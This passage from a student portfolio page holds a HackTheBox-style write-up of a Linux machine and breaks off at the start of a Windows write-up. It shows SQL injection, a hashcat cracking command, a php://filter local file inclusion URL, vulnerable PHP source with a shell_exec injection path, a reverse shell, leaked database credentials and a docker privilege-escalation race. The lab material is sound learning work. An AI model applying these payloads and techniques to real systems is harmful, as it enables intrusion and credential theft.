          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
